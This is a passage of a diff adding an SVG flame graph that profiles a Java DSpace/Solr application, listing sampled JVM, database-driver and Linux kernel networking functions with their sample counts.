+<text  x="1036.10" y="975.5" ></text>
+</g>
+<g >
+<title>__memmove_avx_unaligned_erms (1 samples, 0.09%)</title><rect x="823.5" y="773" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="826.53" y="783.5" ></text>
+</g>
+<g >
+<title>enqueue_entity (1 samples, 0.09%)</title><rect x="259.3" y="597" width="1.1" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="262.33" y="607.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/SolrInputDocument:::addField (2 samples, 0.18%)</title><rect x="890.2" y="949" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="893.16" y="959.5" ></text>
+</g>
+<g >
+<title>ip_queue_xmit (1 samples, 0.09%)</title><rect x="134.7" y="1125" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="137.66" y="1135.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::setInt (1 samples, 0.09%)</title><rect x="1029.9" y="901" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1032.87" y="911.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (1 samples, 0.09%)</title><rect x="1165.3" y="981" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1168.28" y="991.5" ></text>
+</g>
+<g >
+<title>tcp_v4_connect (1 samples, 0.09%)</title><rect x="1078.2" y="629" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="1081.23" y="639.5" ></text>
+</g>
+<g >
+<title>ttwu_do_wakeup (2 samples, 0.18%)</title><rect x="271.1" y="613" width="2.2" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="274.15" y="623.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/TypeConverterDelegate:::doConvertValue (1 samples, 0.09%)</title><rect x="722.5" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="725.51" y="927.5" ></text>
+</g>
+<g >
+<title>do_softirq_own_stack (1 samples, 0.09%)</title><rect x="1078.2" y="437" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1081.23" y="447.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.09%)</title><rect x="1157.8" y="853" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1160.76" y="863.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (1 samples, 0.09%)</title><rect x="1047.1" y="981" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1050.07" y="991.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::getColumnNames (1 samples, 0.09%)</title><rect x="868.7" y="933" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="871.67" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::getInt (1 samples, 0.09%)</title><rect x="866.5" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="869.52" y="927.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%)</title><rect x="832.1" y="933" width="3.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="835.13" y="943.5" ></text>
+</g>
+<g >
+<title>jbyte_disjoint_arraycopy (2 samples, 0.18%)</title><rect x="457.1" y="805" width="2.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="460.07" y="815.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.09%)</title><rect x="1168.5" y="917" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1171.51" y="927.5" ></text>
+</g>
+<g >
+<title>__poll (3 samples, 0.27%)</title><rect x="1109.4" y="869" width="3.2" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="1112.40" y="879.5" ></text>
+</g>
+<g >
+<title>ipt_do_table (1 samples, 0.09%)</title><rect x="249.7" y="597" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="252.65" y="607.5" ></text>
+</g>
+<g >
+<title>net_rx_action (1 samples, 0.09%)</title><rect x="1078.2" y="405" width="1.1" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="1081.23" y="415.5" ></text>
+</g>
+<g >
+<title>_raw_spin_unlock_bh (1 samples, 0.09%)</title><rect x="163.7" y="1189" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="166.68" y="1199.5" ></text>
+</g>
+<g >
+<title>nft_ct_get_eval (1 samples, 0.09%)</title><rect x="296.9" y="773" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="299.94" y="783.5" ></text>
+</g>
+<g >
+<title>jbyte_disjoint_arraycopy (1 samples, 0.09%)</title><rect x="813.9" y="741" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="816.86" y="751.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (1 samples, 0.09%)</title><rect x="838.6" y="853" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="841.58" y="863.5" ></text>
+</g>
+<g >
+<title>nft_do_chain (1 samples, 0.09%)</title><rect x="1121.2" y="597" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1124.22" y="607.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (2 samples, 0.18%)</title><rect x="783.8" y="917" width="2.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="786.77" y="927.5" ></text>
+</g>
+<g >
+<title>ctx_sched_out (2 samples, 0.18%)</title><rect x="100.3" y="1077" width="2.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="103.27" y="1087.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/HttpPoolEntry:::close (1 samples, 0.09%)</title><rect x="1122.3" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1125.30" y="959.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%)</title><rect x="827.8" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="830.83" y="927.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (16 samples, 1.46%)</title><rect x="766.6" y="933" width="17.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="769.58" y="943.5" ></text>
+</g>
+<g >
+<title>java/lang/ref/Finalizer:::register (1 samples, 0.09%)</title><rect x="1019.1" y="869" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1022.13" y="879.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$CharProperty:::match (1 samples, 0.09%)</title><rect x="716.1" y="709" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="719.07" y="719.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$CharProperty:::match (1 samples, 0.09%)</title><rect x="1144.9" y="933" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1147.86" y="943.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::loadParameters (1 samples, 0.09%)</title><rect x="839.7" y="933" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="842.65" y="943.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Bundle:::getBitstreams (1 samples, 0.09%)</title><rect x="729.0" y="965" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="731.96" y="975.5" ></text>
+</g>
+<g >
+<title>__tcp_push_pending_frames (1 samples, 0.09%)</title><rect x="1121.2" y="741" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="1124.22" y="751.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (7 samples, 0.64%)</title><rect x="1101.9" y="677" width="7.5" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1104.88" y="687.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.09%)</title><rect x="851.5" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="854.48" y="911.5" ></text>
+</g>
+<g >
+<title>__fget_light (2 samples, 0.18%)</title><rect x="364.6" y="1221" width="2.2" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="367.64" y="1231.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (1 samples, 0.09%)</title><rect x="421.6" y="789" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="424.60" y="799.5" ></text>
+</g>
+<g >
+<title>java/net/SocketOutputStream:::socketWrite0 (1 samples, 0.09%)</title><rect x="823.5" y="805" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="826.53" y="815.5" ></text>
+</g>
+<g >
+<title>__fdget (1 samples, 0.09%)</title><rect x="136.8" y="1221" width="1.1" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="139.81" y="1231.5" ></text>
+</g>
+<g >
+<title>dequeue_task_fair (7 samples, 0.64%)</title><rect x="102.4" y="1093" width="7.5" height="15.0" fill="rgb(248,120,120)" rx="2" ry="2" />
+<text  x="105.42" y="1103.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/DefaultSingletonBeanRegistry:::getSingleton (2 samples, 0.18%)</title><rect x="1012.7" y="901" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1015.68" y="911.5" ></text>
+</g>
+<g >
+<title>[libjava.so] (2 samples, 0.18%)</title><rect x="1138.4" y="885" width="2.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1141.42" y="895.5" ></text>
+</g>
+<g >
+<title>java/net/SocketOutputStream:::socketWrite0 (1 samples, 0.09%)</title><rect x="537.7" y="789" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="540.67" y="799.5" ></text>
+</g>
+<g >
+<title>ipv4_conntrack_local (6 samples, 0.55%)</title><rect x="213.1" y="1029" width="6.5" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="216.11" y="1039.5" ></text>
+</g>
+<g >
+<title>ip_finish_output2 (1 samples, 0.09%)</title><rect x="1078.2" y="485" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1081.23" y="495.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/TypeConverterDelegate:::convertIfNecessary (95 samples, 8.65%)</title><rect x="621.5" y="933" width="102.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="624.49" y="943.5" >org/springfr..</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.18%)</title><rect x="825.7" y="885" width="2.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="828.68" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::getInt (1 samples, 0.09%)</title><rect x="1145.9" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1148.94" y="959.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.27%)</title><rect x="1017.0" y="917" width="3.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1019.98" y="927.5" ></text>
+</g>
+<g >
+<title>tcp_v4_inbound_md5_hash (1 samples, 0.09%)</title><rect x="290.5" y="773" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="293.49" y="783.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (207 samples, 18.85%)</title><rect x="147.6" y="1301" width="222.4" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="150.56" y="1311.5" >entry_SYSCALL_64_after_hwframe</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.09%)</title><rect x="821.4" y="821" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="824.38" y="831.5" ></text>
+</g>
+<g >
+<title>ext4_lookup (1 samples, 0.09%)</title><rect x="11.1" y="1125" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="14.07" y="1135.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (14 samples, 1.28%)</title><rect x="1175.0" y="1301" width="15.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1177.95" y="1311.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::buildDocument (1 samples, 0.09%)</title><rect x="882.6" y="965" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="885.64" y="975.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/ChunkedOutputStream:::flushCacheWithAppend (3 samples, 0.27%)</title><rect x="536.6" y="821" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="539.59" y="831.5" ></text>
+</g>
+<g >
+<title>ipv4_mtu (3 samples, 0.27%)</title><rect x="357.1" y="1157" width="3.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="360.12" y="1167.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.09%)</title><rect x="735.4" y="789" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="738.41" y="799.5" ></text>
+</g>
+<g >
+<title>jbyte_disjoint_arraycopy (1 samples, 0.09%)</title><rect x="421.6" y="725" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="424.60" y="735.5" ></text>
+</g>
+<g >
+<title>process_backlog (94 samples, 8.56%)</title><rect x="232.5" y="917" width="101.0" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="235.46" y="927.5" >process_back..</text>
+</g>
+<g >
+<title>tick_sched_timer (1 samples, 0.09%)</title><rect x="436.6" y="741" width="1.1" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="439.65" y="751.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/Context:::cache (1 samples, 0.09%)</title><rect x="802.0" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="805.04" y="943.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.18%)</title><rect x="540.9" y="789" width="2.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="543.89" y="799.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::put (1 samples, 0.09%)</title><rect x="883.7" y="933" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="886.72" y="943.5" ></text>
+</g>
+<g >
+<title>__generic_file_write_iter (1 samples, 0.09%)</title><rect x="1139.5" y="725" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1142.49" y="735.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::find (1 samples, 0.09%)</title><rect x="745.1" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="748.08" y="959.5" ></text>
+</g>
+<g >
+<title>blk_update_request (1 samples, 0.09%)</title><rect x="137.9" y="1029" width="1.1" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="140.89" y="1039.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.27%)</title><rect x="1106.2" y="629" width="3.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1109.17" y="639.5" ></text>
+</g>
+<g >
+<title>handle_edge_irq (1 samples, 0.09%)</title><rect x="631.2" y="821" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="634.17" y="831.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/JavaBinCodec:::readVal (1 samples, 0.09%)</title><rect x="1125.5" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1128.52" y="927.5" ></text>
+</g>
+<g >
+<title>java/net/SocketOutputStream:::socketWrite0 (3 samples, 0.27%)</title><rect x="452.8" y="821" width="3.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="455.77" y="831.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="1155.6" y="917" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1158.61" y="927.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (12 samples, 1.09%)</title><rect x="803.1" y="917" width="12.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="806.11" y="927.5" ></text>
+</g>
+<g >
+<title>try_to_wake_up (20 samples, 1.82%)</title><rect x="252.9" y="645" width="21.5" height="15.0" fill="rgb(237,105,105)" rx="2" ry="2" />
+<text  x="255.88" y="655.5" >t..</text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::doReceiveResponse (2 samples, 0.18%)</title><rect x="459.2" y="885" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="462.22" y="895.5" ></text>
+</g>
+<g >
+<title>__inet_lookup_established (1 samples, 0.09%)</title><rect x="244.3" y="773" width="1.1" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="247.28" y="783.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="1068.6" y="885" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1071.56" y="895.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item:::find (21 samples, 1.91%)</title><rect x="1141.6" y="997" width="22.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1144.64" y="1007.5" >o..</text>
+</g>
+<g >
+<title>java/nio/charset/CharsetEncoder:::encode (9 samples, 0.82%)</title><rect x="437.7" y="805" width="9.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="440.72" y="815.5" ></text>
+</g>
+<g >
+<title>queued_spin_lock_slowpath (1 samples, 0.09%)</title><rect x="164.8" y="1173" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="167.75" y="1183.5" ></text>
+</g>
+<g >
+<title>ipt_do_table (3 samples, 0.27%)</title><rect x="205.6" y="1013" width="3.2" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="208.59" y="1023.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (2 samples, 0.18%)</title><rect x="1138.4" y="837" width="2.2" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1141.42" y="847.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject:::getMetadata (30 samples, 2.73%)</title><rect x="766.6" y="965" width="32.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="769.58" y="975.5" >or..</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::getInt (1 samples, 0.09%)</title><rect x="777.3" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.32" y="927.5" ></text>
+</g>
+<g >
+<title>org/springframework/context/annotation/CommonAnnotationBeanPostProcessor:::findResourceMetadata (1 samples, 0.09%)</title><rect x="934.2" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="937.23" y="879.5" ></text>
+</g>
+<g >
+<title>java/net/URI:::&lt;init&gt; (1 samples, 0.09%)</title><rect x="1067.5" y="933" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1070.49" y="943.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::equals (1 samples, 0.09%)</title><rect x="874.0" y="901" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="877.04" y="911.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.09%)</title><rect x="77.7" y="1125" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="80.70" y="1135.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (1 samples, 0.09%)</title><rect x="877.3" y="917" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="880.27" y="927.5" ></text>
+</g>
+<g >
+<title>__libc_enable_asynccancel (1 samples, 0.09%)</title><rect x="1024.5" y="773" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1027.50" y="783.5" ></text>
+</g>
+<g >
+<title>__libc_disable_asynccancel (3 samples, 0.27%)</title><rect x="79.9" y="1317" width="3.2" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="82.85" y="1327.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1078.2" y="821" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1081.23" y="831.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (1 samples, 0.09%)</title><rect x="249.7" y="613" width="1.0" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="252.65" y="623.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="461.4" y="805" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="464.37" y="815.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketOutputStream_socketWrite0 (1 samples, 0.09%)</title><rect x="1170.7" y="901" width="1.0" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1173.66" y="911.5" ></text>
+</g>
+<g >
+<title>handle_edge_irq (1 samples, 0.09%)</title><rect x="137.9" y="1173" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="140.89" y="1183.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item:::getCollections (30 samples, 2.73%)</title><rect x="840.7" y="965" width="32.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="843.73" y="975.5" >or..</text>
+</g>
+<g >
+<title>__fdget (1 samples, 0.09%)</title><rect x="363.6" y="1221" width="1.0" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="366.57" y="1231.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="569.9" y="901" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="572.91" y="911.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="462.4" y="741" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="465.44" y="751.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="632.2" y="869" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="635.24" y="879.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%)</title><rect x="812.8" y="757" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="815.79" y="767.5" ></text>
+</g>
+<g >
+<title>__hrtimer_init (1 samples, 0.09%)</title><rect x="1109.4" y="725" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="1112.40" y="735.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::setInt (1 samples, 0.09%)</title><rect x="1029.9" y="885" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1032.87" y="895.5" ></text>
+</g>
+<g >
+<title>acpi_irq (1 samples, 0.09%)</title><rect x="132.5" y="1029" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="135.51" y="1039.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::clazz (1 samples, 0.09%)</title><rect x="928.9" y="757" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="931.85" y="767.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::split (3 samples, 0.27%)</title><rect x="578.5" y="965" width="3.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="581.51" y="975.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (9 samples, 0.82%)</title><rect x="783.8" y="933" width="9.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="786.77" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::flush (1 samples, 0.09%)</title><rect x="1079.3" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1082.31" y="927.5" ></text>
+</g>
+<g >
+<title>ExceptionBlob (1 samples, 0.09%)</title><rect x="1062.1" y="949" width="1.1" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="1065.11" y="959.5" ></text>
+</g>
+<g >
+<title>__vfprintf_internal (1 samples, 0.09%)</title><rect x="10.0" y="1269" width="1.1" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="13.00" y="1279.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="725.7" y="901" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="728.74" y="911.5" ></text>
+</g>
+<g >
+<title>clone_endio (1 samples, 0.09%)</title><rect x="137.9" y="901" width="1.1" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="140.89" y="911.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (1 samples, 0.09%)</title><rect x="748.3" y="933" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="751.31" y="943.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject:::getMetadataByMetadataString (1 samples, 0.09%)</title><rect x="798.8" y="965" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="801.82" y="975.5" ></text>
+</g>
+<g >
+<title>JVM_MonitorNotifyAll (1 samples, 0.09%)</title><rect x="739.7" y="853" width="1.1" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="742.71" y="863.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/QueryRequest:::getParams (1 samples, 0.09%)</title><rect x="1126.6" y="981" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1129.59" y="991.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (2 samples, 0.18%)</title><rect x="1151.3" y="885" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1154.31" y="895.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="1155.6" y="933" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1158.61" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%)</title><rect x="867.6" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="870.60" y="911.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (5 samples, 0.46%)</title><rect x="548.4" y="645" width="5.4" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="551.42" y="655.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (8 samples, 0.73%)</title><rect x="1100.8" y="805" width="8.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1103.80" y="815.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::sequence (6 samples, 0.55%)</title><rect x="925.6" y="773" width="6.5" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="928.63" y="783.5" ></text>
+</g>
+<g >
+<title>__handle_irq_event_percpu (1 samples, 0.09%)</title><rect x="132.5" y="1045" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="135.51" y="1055.5" ></text>
+</g>
+<g >
+<title>__netif_receive_skb (1 samples, 0.09%)</title><rect x="1078.2" y="373" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1081.23" y="383.5" ></text>
+</g>
+<g >
